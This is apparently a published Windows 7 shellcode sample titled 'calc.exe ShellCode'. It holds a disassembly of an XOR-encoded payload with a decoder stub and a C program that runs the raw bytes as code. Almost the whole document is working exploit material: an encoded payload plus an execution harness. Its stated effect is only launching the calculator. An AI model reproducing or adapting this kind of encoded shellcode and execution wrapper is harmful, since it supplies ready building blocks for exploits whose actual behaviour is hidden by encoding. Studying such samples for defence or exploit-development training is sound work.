/*
title : win32/Seven Ultimate calc.exe ShellCode
Author: Ayrbyte
Link : -
Version: -
Category: local
Tested on: Windows 7 Ultimate
Code : c++
(diasembly code)
00401B62 DBD7 FCMOVNBE ST,ST(7)
00401B64 D97424 F4 FSTENV (28-BYTE) PTR SS:[ESP-C]
00401B68 B8 79C464B7 MOV EAX,B764C479
00401B6D 33C9 XOR ECX,ECX
00401B6F B1 38 MOV CL,38
00401B71 5D POP EBP
00401B72 83C5 04 ADD EBP,4
00401B75 3145 13 XOR DWORD PTR SS:[EBP+13],EAX
00401B78 033CD7 ADD EDI,DWORD PTR DS:[EDI+EDX*8]
00401B7B 8642 42 XCHG BYTE PTR DS:[EDX+42],AL
00401B7E 3F AAS
00401B7F CF IRETD
00401B80 AD LODS DWORD PTR DS:[ESI]
00401B81 BA C0B0245F MOV EDX,5F24B0C0
00401B86 F1 INT1
00401B87 E2 53 LOOPD SHORT test.00401BDC
00401B89 14 A0 ADC AL,0A0
00401B8B 3217 XOR DL,BYTE PTR DS:[EDI]
00401B8D 78 49 JS SHORT test.00401BD8
00401B8F B8 7568DACC MOV EAX,CCDA6875
00401B94 51 PUSH ECX
00401B95 9F LAHF
00401B96 6B7A 84 AE IMUL EDI,DWORD PTR DS:[EDX-7C],-52
00401B9A 6C INS BYTE PTR ES:[EDI],DX ; I/O command
00401B9B 4A DEC EDX
00401B9C 087CAE CC OR BYTE PTR DS:[ESI+EBP*4-34],BH
00401BA0 F4 HLT ; Privileged command
00401BA1 ^7E E3 JLE SHORT test.00401B86
00401BA3 2E:C4B1 F62F01>LES ESI,FWORD PTR CS:[ECX+AF012FF6] ; Modification of segment register
00401BAA F9 STC
00401BAB 62DA BOUND EBX,EDX ; Illegal use of register
00401BAD A4 MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
00401BAE A8 92 TEST AL,92
00401BB0 6F OUTS DX,DWORD PTR ES:[EDI] ; I/O command
00401BB1 F8 CLC
00401BB2 ^70 92 JO SHORT test.00401B46
00401BB4 BF 77C8ECBA MOV EDI,BAECC877
00401BB9 47 INC EDI
00401BBA BD 46C4976E MOV EBP,6E97C446
00401BBF DC8E 0F04BA2E FMUL QWORD PTR DS:[ESI+2EBA040F]
00401BC5 2E:C9 LEAVE ; Superfluous prefix
00401BC7 D813 FCOM DWORD PTR DS:[EBX]
00401BC9 79 66 JNS SHORT test.00401C31
00401BCB 2AE7 SUB AH,BH
00401BCD ^78 AE JS SHORT test.00401B7D
00401BCF 6208 BOUND ECX,QWORD PTR DS:[EAX]
00401BD1 4B DEC EBX
00401BD2 8E29 MOV GS,WORD PTR DS:[ECX] ; Modification of segment register
00401BD4 37 AAA
00401BD5 64:0333 ADD ESI,DWORD PTR FS:[EBX]
00401BD8 7F 42 JG SHORT test.00401C1C
00401BDA FC CLD
00401BDB 46 INC ESI
00401BDC 8BB1 815048C8 MOV ESI,DWORD PTR DS:[ECX+C8485081]
00401BE2 5D POP EBP
00401BE3 D4 4D AAM 4D
00401BE5 6A 15 PUSH 15
00401BE7 4E DEC ESI
00401BE8 B6 8B MOV DH,8B
00401BEA FA CLI
00401BEB 093D 87B75E19 OR DWORD PTR DS:[195EB787],EDI
00401BF1 8B46 B2 MOV EAX,DWORD PTR DS:[ESI-4E]
00401BF4 11B7 C335F63E ADC DWORD PTR DS:[EDI+3EF635C3],ESI
00401BFA 97 XCHG EAX,EDI
00401BFB 11D2 ADC EDX,EDX
00401BFD 1B43 3B SBB EAX,DWORD PTR DS:[EBX+3B]
00401C00 43 INC EBX
00401C01 C122 44 SHL DWORD PTR DS:[EDX],44 ; Shift constant out of range 1..31
00401C04 93 XCHG EAX,EBX
00401C05 AD LODS DWORD PTR DS:[ESI]
00401C06 9B WAIT
00401C07 ^E0 DF LOOPDNE SHORT test.00401BE8
00401C09 5F POP EDI
00401C0A CF IRETD
00401C0B 93 XCHG EAX,EBX
00401C0C BD 350E11B8 MOV EBP,B8110E35
00401C11 70 10 JO SHORT test.00401C23
00401C13 29C3 SUB EBX,EAX
00401C15 D279 18 SAR BYTE PTR DS:[ECX+18],CL
00401C18 48 DEC EAX
00401C19 BD FEA59BFA MOV EBP,FA9BA5FE
00401C1E F1 INT1
00401C1F EF OUT DX,EAX ; I/O command
00401C20 86AA 99A952EF XCHG BYTE PTR DS:[EDX+EF52A999],CH
00401C26 C7 ??? ; Unknown command
00401C27 49 DEC ECX
00401C28 8933 MOV DWORD PTR DS:[EBX],ESI
00401C2A FEC9 DEC CL
00401C2C 38CB CMP BL,CL
00401C2E 05 D148CE42 ADD EAX,42CE48D1
00401C33 55 PUSH EBP
00401C34 A0 A2DB30C6 MOV AL,BYTE PTR DS:[C630DBA2]
00401C39 11DB ADC EBX,EBX
00401C3B 10A5 AF7FCC43 ADC BYTE PTR SS:[EBP+43CC7FAF],AH
00401C41 A1 1B9DE44E MOV EAX,DWORD PTR DS:[4EE49D1B]
00401C46 B8 3272C334 MOV EAX,34C37232
00401C4B D0E9 SHR CL,1
00401C4D 1087 4691378B ADC BYTE PTR DS:[EDI+8B379146],AL
00401C53 15 7BD22BBF ADC EAX,BF2BD27B
00401C58 8300 00 ADD DWORD PTR DS:[EAX],0
*/
#include <windows.h>
char string[] =
"\xdb\xd7\xd9\x74\x24\xf4\xb8\x79\xc4\x64\xb7\x33\xc9\xb1\x38"
"\x5d\x83\xc5\x04\x31\x45\x13\x03\x3c\xd7\x86\x42\x42\x3f\xcf"
"\xad\xba\xc0\xb0\x24\x5f\xf1\xe2\x53\x14\xa0\x32\x17\x78\x49"
"\xb8\x75\x68\xda\xcc\x51\x9f\x6b\x7a\x84\xae\x6c\x4a\x08\x7c"
"\xae\xcc\xf4\x7e\xe3\x2e\xc4\xb1\xf6\x2f\x01\xaf\xf9\x62\xda"
"\xa4\xa8\x92\x6f\xf8\x70\x92\xbf\x77\xc8\xec\xba\x47\xbd\x46"
"\xc4\x97\x6e\xdc\x8e\x0f\x04\xba\x2e\x2e\xc9\xd8\x13\x79\x66"
"\x2a\xe7\x78\xae\x62\x08\x4b\x8e\x29\x37\x64\x03\x33\x7f\x42"
"\xfc\x46\x8b\xb1\x81\x50\x48\xc8\x5d\xd4\x4d\x6a\x15\x4e\xb6"
"\x8b\xfa\x09\x3d\x87\xb7\x5e\x19\x8b\x46\xb2\x11\xb7\xc3\x35"
"\xf6\x3e\x97\x11\xd2\x1b\x43\x3b\x43\xc1\x22\x44\x93\xad\x9b"
"\xe0\xdf\x5f\xcf\x93\xbd\x35\x0e\x11\xb8\x70\x10\x29\xc3\xd2"
"\x79\x18\x48\xbd\xfe\xa5\x9b\xfa\xf1\xef\x86\xaa\x99\xa9\x52"
"\xef\xc7\x49\x89\x33\xfe\xc9\x38\xcb\x05\xd1\x48\xce\x42\x55"
"\xa0\xa2\xdb\x30\xc6\x11\xdb\x10\xa5\xaf\x7f\xcc\x43\xa1\x1b"
"\x9d\xe4\x4e\xb8\x32\x72\xc3\x34\xd0\xe9\x10\x87\x46\x91\x37"
"\x8b\x15\x7b\xd2\x2b\xbf\x83";
int main(){((void (*)(void))string)();}
